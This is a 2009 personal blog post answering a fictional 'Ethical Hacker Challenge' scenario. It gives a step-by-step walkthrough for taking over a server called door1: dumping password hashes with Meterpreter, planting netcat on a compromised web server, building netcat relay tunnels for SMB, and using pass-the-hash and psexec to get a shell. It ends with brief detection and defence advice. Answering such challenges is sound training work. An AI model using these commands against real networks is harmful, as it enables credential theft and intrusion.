Protected by Copyscape DMCA Takedown Notice Infringement Search Tool
All opinions expressed on this blog are my own and do not reflect those of BIET Jhansi students and employees,staff,or any official whatsoever, colleagues, family or friends.I express my opinions as a free citizen of a democracy exercising my Fundamental Right of speech. The intention of this blog is merely to air my views and opinions (and sometimes, frustration) and is not intended to insult, instigate,disgrace or hurt anyone(body,organisation or institution). Anyone is free to disagree with any or all of my views and can express them here or elsewhere. Any civil dialogue that is not unreasonably hurtful is welcome. I, however, reserve the right to delete any comment without any reason or warning.No content of this blog will in any way be a violation UNDER IPC Sections 506 and 295A .Legal issues if any will be ristricted to the MEERUT jurisdiction only.This blog/web space is in the process of being copyrighted to safegaurd my interests erstwhile this be considered to be under the creative commons commercial INDIA License.This space resorts to politically and ethically correct statements, complying with the spirit of blogging .This is an opinion medium, not a reporting medium and hence should not be IN ANY CASE BE TAKEN AS A FUNCTION OF MAINSTREAM MEDIA.The blog complies with the NAAVI guidelines. Thank you, MANOJ SINGH RANA

Sunday, October 4, 2009

Ethical Hacker Challenge

Devise a step-by-step approach for gaining control of the door1 server so that Kris can execute the dooropen.exe command with the privileges of the jailmaster account. Describe each tool you would use and how you would use it at each step of your hack.

The basic plan is the following:

1. dump the password hashes from "jailmasterlaptop"
2. use "web1" to create a tunnel for a SMB connection to "door1"
3. use psexec + pshtoolkit to authenticate and run the executable

Now for the gory details:

- after compromising the "jailmasterlaptop", hopefully we have access to the meterpreter. There type:

use priv
hashdump

(the first command might not be necessary, but it doesn't do any harm). Note the hashes for the Jail Master account.

- get a netcat onto web1, if there isn't one already (many *NIX systems come with it preinstalled). For example you could do something like this with the command execution vulnerability:

on the laptop:

encode the netcat with base64: base64 -w0 /bin/nc

execute the following commands on "web1":

echo "The base64 encoded string"|base64 -d > /tmp/fb
chmod +x /tmp/fb

If we use the uploaded netcat, change all references in the following text from nc to /tmp/fb

- now we are ready to create the tunnel. Since we have the restriction of only being able to create outgoing connections from "web1", we do the following:

on the laptop (as root):

while true; do nc -l -p 80 -c "nc -l -p 139"; done

on "web1" (trough the command execution vulnerability):

while true; do nc door1 139 -c "nc laptop 80"; done

The while loop is there to give use some leeway if we don't manage to connect in the first try or we get disconnected for some reason.

- being connected, we now need the Pass The hash toolkit download at step 1. There is a slight problem here: on the laptop we might have a version of XP which isn't supported by iam.exe and iam-alt.exe has a little bug (http://hexale.blogspot.com/2008/10/bug-in-iam-alt-makes-it-fail-completely.html). We have two options: fix the bug in the source as the blog post describes and hope that we have a compiler to recompile the source, or patch the binary, by searching for 00x (inverted because of the little endianess of Intel CPU's) in it with a hex editor (mcedit will do) and patch it with \x00\x00\x00 (three time the zero byte) :-)

The toolkit executables need to run from the SYSTEM account, so launch a shell with psexec that has SYSTEM account privileges:

psexec \\laptop -s c:\windows\system32\cmd.exe

Now inject the hash:

iam-alt.exe -h jailmaster:door1:thehashes:recoveredfromjailmasterlaptop

- Finally use psexec to spawn a shell to door1 (proxied trough the laptop and web1):

psexec \\laptop -u DOOR1\jailmaster c:\windows\system32\cmd.exe

Now that we (hopefully) have a shell on door1, search for the executable:

cd \
dir /s|find "dooropen"

3) Briefly finish this tale by describing how the Burgermeisters could detect the tactics you described in your answer to item 2, as well as how they could have defended against each step you described.

The week link in the chain was the "web1" machine. They should have:

* make sure that the web application doesn't have known vulneraibilities :-)
* use something like mod_security to look for suspicious access patterns
* use something like SELinux to disallow stuff like executables being run from /tmp
* disallow all outgoing connections from the server

Patching jailmasterlaptop would also have helped ;-)

Finally, a login restriction could have been placed on the jailmaster account on "door1", such that the account could not be used during non-working hours.
Posted by at

No comments:

Post a Comment

Comments Section

Subscribe to: Post Comments (Atom)